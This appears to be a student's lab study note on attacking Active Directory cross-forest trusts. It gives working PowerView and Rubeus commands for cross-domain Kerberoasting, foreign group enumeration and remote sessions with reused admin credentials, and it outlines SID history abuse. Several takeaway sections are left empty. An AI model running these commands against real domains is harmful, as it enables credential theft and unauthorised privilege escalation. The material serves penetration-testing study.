27.Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

I. Cross-Forest Kerberoasting

Concept: Performing Kerberoasting across domain trusts to obtain credentials for accounts in other domains.

Steps:

Enumerate SPNs:

Use PowerView:

Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

Verify account privileges:

Use PowerView:

Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof

Perform Kerberoasting:

Use Rubeus with the /domain: flag:

.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Key Takeaway:

II. Admin Password Re-Use & Group Membership

Password Re-Use:

Group Membership:

Enumerating foreign group memberships to find accounts with cross-domain privileges.

Commands:

Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

Verify Access:

Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

Key Takeaway:

III. SID History Abuse - Cross Forest

Concept:

Abusing SID history across forest trusts when SID filtering is not enabled.
Allows accounts to retain privileges from their original domain after migration.

Mechanism:

Adding SIDs from one forest to the sidHistory attribute of accounts in another.
The user retains the rights of the added SID in their token.

Key Takeaway:

Exploiting misconfigurations in trust relationships to maintain or gain privileges.

IV. Important Considerations:

Last updated 8 months ago